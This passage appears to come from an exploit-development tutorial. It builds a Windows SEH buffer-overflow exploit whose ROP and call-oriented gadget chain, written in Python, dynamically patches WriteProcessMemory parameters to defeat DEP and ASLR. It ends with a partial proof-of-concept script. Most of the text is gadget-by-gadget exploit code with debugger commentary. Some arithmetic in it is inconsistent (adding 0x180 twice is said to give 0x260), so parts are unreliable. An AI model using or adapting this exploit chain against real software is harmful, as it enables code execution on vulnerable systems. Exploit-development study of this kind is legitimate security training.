Let’s say we get the parameter placeholder’s location (e.g. the virtual memory address, not the 0x11111111 itself) in ECX (which we will). If we were to read the value of ECX, we would be reading the value 0x2826930. However, if we read the value of dword ptr [ecx] instead- we would be reading the actual value of 0x11111111.

The first part of the image above shows the value of the address itself. The second part of the image shows what happens when we “dereference” (using poi in WinDbg), or extract the value a memory address is pointing to. We can leverage this, by using an arbitrary write primtive. When we get the address of the lpBuffer parameter into ECX- we then will not overwrite ECX, but rather dword ptr [ecx]- which will force the address on the stack (which contains the parameter placeholder) to point to something other than 0x11111111.

Remember- everytime the process is terminated and restarted- the virtual memory on the stack changes. This is why we need to dynamically resolve this parameter, instead of hardcoding an address.

We will use the following ROP gadgets, in order to make ECX contain the stack address holding the lpBuffer parameter placeholder.

crash += struct.pack('<L', 0x1001dacc)		# inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)		# inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)		# inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)		# inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)		# inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)		# inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)		# inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)		# inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)		# inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)		# inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)		# inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)		# inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)		# inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)		# inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)		# inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)		# inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)

Two things about the above ROP gadgets. First, the clc instruction.

clc is an assembly instruction that clears the “carry” flag (the CF register). None of our ROP gadgets, now or later, depend on the state of this flag- so it is okay that this instruction resides in this gadget. Additionally, we have a mov edx, dword [ecx-0x4] instruction. Currently, we are not using the EDX register for anything- so this instruction will not consequently disrupt what we are trying to achieve.

Also notably, this set of ROP gadgets only increases ECX by 16 decimal bytes (0x10 hexadecimal)- even though the parameter placeholder for lpBuffer is located 0x18 bytes away (24 decimal bytes).

This is again a “preparatory” procedure for our future ROP gadgets. We need a gadget, similar to the following: mov dword ptr [ecx], reg, where reg refers to any register that contains the stack address of our shellcode and dword ptr [ecx] contains the stack address which is currently serving as the parameter placeholder for lpBuffer. This will essentially take what ECX is pointing to, which is 0x11111111, and overwrite the pointer with the actual address of our shellcode.

However, there were no such gadgets that were found easily in the process memory. The closest gadget was mov dword ptr [ecx+0x8], eax. Knowing this, we will only raise ECX to 0x10 instead of 0x18- due to the gadget overwriting ECX’s pointer at an offset of 0x8 (0x18 - 0x10 = 0x8).

The key is now to give some padding between the space on the stack for our future ROP gadgets and our shellcode. To do this, we will provide approximately 0x300 bytes of space on the stack for remaining ROP gadgets. This will allow us to “simulate” the rest of our ROP gadgets and choose a place on the stack that our shellcode will go, and start performing these calculations now. Think of these 0x300 bytes as “ROP gadget placeholders”. If perhaps we would need more than 0x300 bytes, due to more ROP gadgets needed than anticipated, we would move our shellcode down lower. We will “aim” for 0x300 bytes down the stack, and we will add NOPs to compensate for any of the unused 0x300 bytes (if necessary). The following ROP gadgets can accomplish loading the location of our “shellcode” (future shellcode) into EAX.

crash += struct.pack('<L', 0x1001fce9)		# pop esi ; add esp + 0x8 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0xfffffd44)		# Shellcode is about negative 0xfffffd44 (0x2dc) bytes away from EAX
crash += struct.pack('<L', 0x90909090)		# Compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)		# Compensate for above ROP gadget
crash += struct.pack('<L', 0x10022f45)		# sub eax, esi ; pop edi ; pop esi ; ret
crash += struct.pack('<L', 0x90909090)		# Compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)		# Compensate for above ROP gadget

The location where our shellcode will be (your location can be different, depending on how far down the stack you wish to place it) is 0x2dc bytes away from the value in EAX. To load our shellcode value into EAX, we need to increase it by 0x2dc bytes. Obviously, this is too much for just consecutive inc eax gadgets. Additionally, if we directly add to EAX- the NULL byte problem would kill our exploit. This is because a 32-bit register, like EAX, needs the value 0x000002dc to completely fill its contents. To address this, we can use negative numbers and subtraction to yield the same result!

The negative representation of 0x2dc will be loaded into ESI. We will then need to also compensate for the add esp + 0x8 instruction. To do this, we will add 0x8 bytes of padding so no gadgets get “jumped over”. Then, we will subtract the value in ESI from EAX- and place the difference in EAX. This will result in the address of where our shellcode will go being placed into EAX. Additionally, we need compensate for two pop gadgets.

Let’s view the ROP routine in WinDbg. Program execution reaches our ECX manipulating gadget(s).

Stepping through the 16 gadgets, ECX is now 8 bytes behind the lpBuffer parameter- as expected.

Program execution then redirects to the EAX manipulation routine.

The intended negative value of 0x2dc is placed into ESI.

The value is then subtracted and the difference is placed in EAX! We have successfully loaded the address of where our shellcode will go, futher down the stack, into EAX.

Note, the address where our shellcode will go is denoted with NOPs in the above image for visual effect. This was done in the debugger to outline the process taken here.

The last step is to utilize the following ROP gadget to change the lpBuffer parameter placeholder to point to the legitimate parameter (which is the shellcode location down the stack).

crash += struct.pack('<L', 0x10021bfb)		# mov dword [ecx+0x8], eax ; ret: ImageLoad.dll (non-ASLR enabled module)

Program execution reaches the gadget in question.

As we can already see from the image above, 0x11111111 (which is the parameter placeholder for lpBuffer), is going to be what is overwritten with the contents of EAX (which contains the stack address which points to our shellcode.

State of the lpBuffer parameter placeholder before the instruction is stepped through.

After stepping through the instruction- we can see the lpBuffer parameter placeholder has been dynamically changed to the correct address!

nSize

nSize, as you can recall from earlier, refers to the size of our region of memory we would like written in the process space. We would like the size of our shellcode to be about 0x180 bytes (384 decimal)- as this is more than enough for any type of shellcode.

Since ECX and EAX are being used for stack addresses- let’s use another register for this parameter. Let’s use EDX.

Parsing the application for gadgets, there is a nice one for adding directly to EDX in multiples of 0x20.

crash += struct.pack('<L', 0x1001b884)		# add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)		# add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)		# add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)		# add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)		# add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)		# add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)		# add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)		# add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)		# add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)		# add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)		# add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)		# add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)

Although the gadget is very nice, as we just need to add to EDX until the value of 0x180 is placed in it, the gadget doesn’t end with a ret- meaning it will not return back to the stack and pick up the next gadget.

Instead, this gadget performs a call edi instruction. This, at first glance- will completley kill our ROP chain, as execution will not redirect back to the stack. However, there is a way around this- with a technique called Call-oriented Programming (COP).

Essentially, since we know that EDI will be called, we could pop a ROP gadget, which would perform an add esp, X ; ret. Why add, esp X you may ask?

As you may, or may not, know- when a call instruction is executed- it pushes its return address onto the stack. This is done so the caller knows where to return after it is done executing. However, we can just execute an add esp X gadget to jump over this return address and back into our ROP chain. However, there is one more thing that we need to take into account from our gadget, and that is push edx.

This will push the EDX register onto the stack before the call instruction pushes its return address onto the stack- meaning a total of 0x8 (2 DWORDS) bytes will be pushed onto the stack. To compensate for this, we will load an add esp, 0x8 ; ret.

Here is how our routine of gadgets will look, in totality.

crash += struct.pack('<L', 0x100103ff)		# pop edi ; ret: ImageLoad.dll (non-ASLR enabled module) (Compensation for COP gadget add edx, 0x20)
crash += struct.pack('<L', 0x1001c31e)		# add esp, 0x8 ; ret: ImageLoadl.dll (non-ASLR enabled module) (Returns to stack after COP gadget)
crash += struct.pack('<L', 0x10022c4c)		# xor edx, edx ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001b884)		# add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)		# add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)		# add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)		# add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)		# add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)		# add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)		# add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)		# add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)		# add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)		# add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)		# add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)		# add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)

Let’s view this all in the debugger.

First, program execution hits our pop edi instruction, which will load the “return to the stack” ROP gadget into EDI.

pop edi places the instruction into EDI.

The next gadget is hit, which will set EDX to zero so we can start with a “clean slate”.

Now, program execution is ready for the add edx, 0x20 gadget- which will be repeated until EDX has been filled with 0x180.

push edx is then executed, resulting in EDX being placed onto the stack.

call edi is now about to be executed. Stepping through the instruction, with t in WinDbg, pushes the caller’s return address onto the stack.

Our add esp, 0x8 routine is queued up for execution, and successfully returns us back to the stack- where the exact same routine will be repeated until 0x180 is placed into EDX.

After repeating the routine, EDX now contains 0x180.

Now that EDX contains our intended value of 0x180, we can eventually use the same mov dword ptr [reg], edx primitive to overwrite the nSize parameter placeholder with out intended value of 0x180.

We used the ECX register, which currently still contains the address on the stack that holds the now correct lpBuffer size parameter - 0x8 (remember, ECX was used at an offset of 0x8 last time, meaning it is technically 0x8 bytes behind the lpBuffer parameter, which is 4 bytes behind the nSize parameter placeholder- for a total of 0xC bytes, or 12 decimal bytes).

As you can see, 0x4 bytes after lpBuffer comes the nSize parameter (as denoted by 0x22222222).

Utilizing the same gadgets from a previous ROP routine- we can increase ECX by 12 (0xC) decimal bytes, to load the parameter placeholder address for nSize.

crash += struct.pack('<L', 0x61c68081)		# inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)		# inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)		# inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)		# inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)		# inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)		# inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)		# inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)		# inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)		# inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)		# inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)		# inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)		# inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)

It should also be noted, that after each of these ROP gadgets are executed- the AL register will be increased by 0x39 bytes. We will compensate for this in the future. Since AL only makes up the lower 8 bits of the EAX register, this will not have much of an adverse effect on what we are trying to accomplish.

The state of the registers before execution can be seen below.

ECX, after the ROP gadgets are executed, is loaded with the address for the nSize parameter placeholder.

A nice gadget can be found, after parsing the PE, to overwrite the parameter placeholder with the legitimate parameter.

crash += struct.pack('<L', 0x1001f5b4)		# mov dword ptr [ecx], edx

The state of the parameters before the overwrite occurs can be seen below.

As we can see, the junk 0x22222222 parameter will be the target for the overwrite.

Stepping through the instruction, we have dynamically changed the parameter placeholder for nSize to the legitimate parameter!

kernel32!WriteProcessMemory

Perfect! All that is left now is to is extract our current pointer to kernel32.dll and calculate the offset between kernel32WriteFileImplementation and kernel32!WriteProcessMemory. After this, we will use the same primitive of dynamically manipulating the kernel32WriteProcessMemory parameter placeholder to point to the actual API.

Currently. ECX (the register we have been leveraging for each of the arbitrary writes to overwrite function parameter placeholders), is 0x14 (20 decimal) bytes away from the kernel32!WriteProcessMemory parameter placeholder.

Knowing this, we will prepare another arbitrary write by decrementing ECX by 0x14 bytes.

crash += struct.pack('<L', 0x61c27d1b)		# dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)		# dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)		# dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)		# dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)		# dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)		# dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)		# dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)		# dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)		# dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)		# dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)		# dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)		# dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)		# dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)		# dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)		# dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)		# dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)		# dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)		# dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)		# dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)		# dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)

Once the ROP gadgets have executed, ECX now contains the same address as the parameter placeholder for kernel32!WriteProcessMemory.

The goal now is to dereference the kernel32!WriteProcessMemory parameter placeholder and place it in a CPU register we have control over.

Since ECX is reserved for the arbitrary write, we will use EAX to also store the kernel32!WriteProcessMemory parameter placeholder.

Recall that EDX still contains a value of 0x180, from the nSize parameter. After all, we have not manipulated EDX since. Conveniently, the current distance between the address within EAX and the kernel32!WriteProcessMemory parameter placeholder is 0x260.

Since we already have a routine of ROP and COP gadgets that increases EDX 0x180 bytes, we can utilize the EXACT same routine to increase it another 0x180 bytes- which will give us a value of 0x260! Once EDX contains the value of 0x260, we can subtract it from EAX and place the difference in EAX. This will allow us to store the kernel32!WriteProcessMemory parameter placholder in EAX. This time, however, since EDI already contains the old “return to the stack” routine- we can just directly add to EDX.

crash += struct.pack('<L', 0x1001b884)		# add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)		# add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)		# add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)		# add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)		# add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)		# add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)		# add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)		# add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)		# add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)		# add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)		# add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)		# add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)

After the add edx COP gadgets execute, EDX contains the distance between the kernel32!WriteProcessMemory and EAX (which is 0x260).

After the COP gadgets execute, the sub eax, edx ; ret gadget takes over execution- resulting in EAX now containing the address of the kernel32!WriteProcessMemory parameter placeholder.

So currently, as it stands, the stack address of 0x2636920, which changes when the process restarts, points to 0x61c832e4- which then points to the kernel32.dll address. This means we have a pointer to a pointer to the pointer we would like to extract. Knowing this, we will dereference 0x2636920 and store the result (which is 0x61c832e4) into EAX. Then, utilizing the exact same routine, we will dereference 0x61c832e4 (which is a pointer to kernel32!WriteFileImplementation) and store the result in EAX. We can achieve this with two ROP gadgets.

crash += struct.pack('<L', 0x1002248c)		# mov eax, dword [eax] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1002248c)		# mov eax, dword [eax] ; ret: ImageLoad.dll (non-ASLR enabled module)

Program execution hits the first gadget, where WinDbg shows us what will be placed in EAX (0x61c832e4).

Utilizing the same ROP gadget, we successfully extract a pointer to kernel32.dll into EAX- dynamically!

This is great news. We have defeated ASLR on the system itself. What needs to happen now is that we need to find the offset between kernel32!WriteProcessMemory and kernel32WriteFileImplementation. To do this, we can use WinDbg.

Great! The distance between the two functions is 0xfffaca4d (remember, to avoid NULL bytes- we use the negative distance).

However, if we subtract these two values- it seems as though there is an issue and kernel32!WriteProcessMemory is not extracted properly.

Instead of fighting with two’s complement math- let’s just use a different function from the IAT. Preferably, let’s find a function that is less than in value, in terms of the virtual address, than kernel32!WriteProcessMemory.

Looking at the IAT for ImageLoad, we can see there is a nice IAT entry that points to kernel32!GetStartupInfoA.

Subtracting the two functions results in a value of 0xfffffd2d- and also yields our desired output!

Now that we have solved this issue, let’s show the full PoC up until this point.

import sys
import os
import socket
import struct

# 4063 byte SEH offset
# Stack pivot lands at padding buffer to SEH at offset 2563
crash = "\x90" * 2563

# Stack pivot lands here
# Beginning ROP chain


# Saving address near ESP for relative calculations into EAX and ECX
# EBP is near stack address
crash += struct.pack('<L', 0x61c05e8c)		# xchg eax, ebp ; ret: sqlite3.dll (non-ASLR enabled module)

# EAX is now 0xfec bytes away from ESP. We want current ESP + 0x28 (to compensate for loading EAX into ECX eventually) into EAX
# Popping negative ESP + 0x28 into ECX and subtracting from EAX
# EAX will now contain a value at ESP + 0x24 (loading ESP + 0x24 into EAX, as this value will be placed in EBP eventually. EBP will then be placed into ESP- which will compensate for ROP gadget which moves EAX into EAX via "leave")
crash += struct.pack('<L', 0x10018606)		# pop ecx, ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0xffffefe0)		# Negative ESP + 0x28 offset
crash += struct.pack('<L', 0x1001283e)		# sub eax, ecx ; ret: ImageLoad.dll (non-ASLR enabled module)

# This gadget is to get EBP equal to EAX (which is further down on the stack) - due to the mov eax, ecx ROP gadget that eventually will occur.
# Said ROP gadget has a "leave" instruction, which will load EBP into ESP. This ROP gadget compensates for this gadget to make sure the stack doesn't get corrupted, by just "hopping" down the stack
# EAX and ECX will now equal ESP - 8 - which is good enough in terms of needing EAX and ECX to be "values around the stack"
crash += struct.pack('<L', 0x61c30547)		# add ebp, eax ; ret sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c6588d)		# mov ecx, eax ; mov eax, ecx ; add esp, 0x24 ; pop ebx ; leave ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x90909090)		# Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)		# Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)		# Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)		# Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)		# Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)		# Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)		# Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)		# Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)		# Padding to compensate for above ROP gadget (pop ebx)
crash += struct.pack('<L', 0x90909090)		# Padding to compensate for above ROP gadget (pop ebp in leave instruction)

# Jumping over kernel32!WriteProcessMemory placeholder parameters
crash += struct.pack('<L', 0x10015eb4)		# add esp, 0x1c ; ret: ImageLoad.dll (non-ASLR enabled module)

# kernel32!WriteProcessMemory placeholder parameters
crash += struct.pack('<L', 0x1004d1ec)		# Pointer to kernel32!GetStartupInfoA (no pointers from IAT directly to kernel32!WriteProcessMemory, so loading pointer to kernel32.dll and compensating later.)
crash += struct.pack('<L', 0x61c72530)		# Return address parameter placeholder (where function will jump to after execution- which is where shellcode will be written to. This is an executable code cave in the .text section of sqlite3.dll)
crash += struct.pack('<L', 0xFFFFFFFF)		# hProccess = handle to current process (Psuedo handle = 0xFFFFFFFF points to current process)
crash += struct.pack('<L', 0x61c72530)		# lpBaseAddress = pointer to where shellcode will be written to. (0x61C72530 is an executable code cade in the .text seciton of sqlite3.dll) 
crash += struct.pack('<L', 0x11111111)		# lpBuffer = base address of shellcode (dynamically generated)
crash += struct.pack('<L', 0x22222222)		# nSize = size of shellcode 
crash += struct.pack('<L', 0x1004D740)		# lpNumberOfBytesWritten = writeable location (.idata section of ImageLoad.dll address in a code cave)

# Starting with lpBuffer (shellcode location)
# ECX currently points to lpBuffer placeholder parameter location - 0x18
# Moving ECX 8 bytes before EAX, as the gadget to overwrite dword ptr [ecx] overwrites it at an offset of ecx+0x8
crash += struct.pack('<L', 0x1001dacc)		# inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)		# inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)		# inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)		# inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)		# inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)		# inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)		# inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)		# inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)		# inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)		# inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)		# inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)		# inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)		# inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)		# inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)		# inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)		# inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)

# Pointing EAX (shellcode location) to data inside of ECX (lpBuffer placeholder) (NOPs before shellcode)
crash += struct.pack('<L', 0x1001fce9)		# pop esi ; add esp + 0x8 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0xfffffd44)		# Shellcode is about negative 0xfffffd44 bytes away from EAX
crash += struct.pack('<L', 0x90909090)		# Compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)		# Compensate for above ROP gadget
crash += struct.pack('<L', 0x10022f45)		# sub eax, esi ; pop edi ; pop esi ; ret
crash += struct.pack('<L', 0x90909090)		# Compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)		# Compensate for above ROP gadget

# Changing lpBuffer placeholder to actual address of shellcode
crash += struct.pack('<L', 0x10021bfb)		# mov dword [ecx+0x8], eax ; ret: ImageLoad.dll (non-ASLR enabled module)

# nSize parameter (0x180 = 384 bytes)
crash += struct.pack('<L', 0x100103ff)		# pop edi ; ret: ImageLoad.dll (non-ASLR enabled module) (Compensation for COP gadget add edx, 0x20)
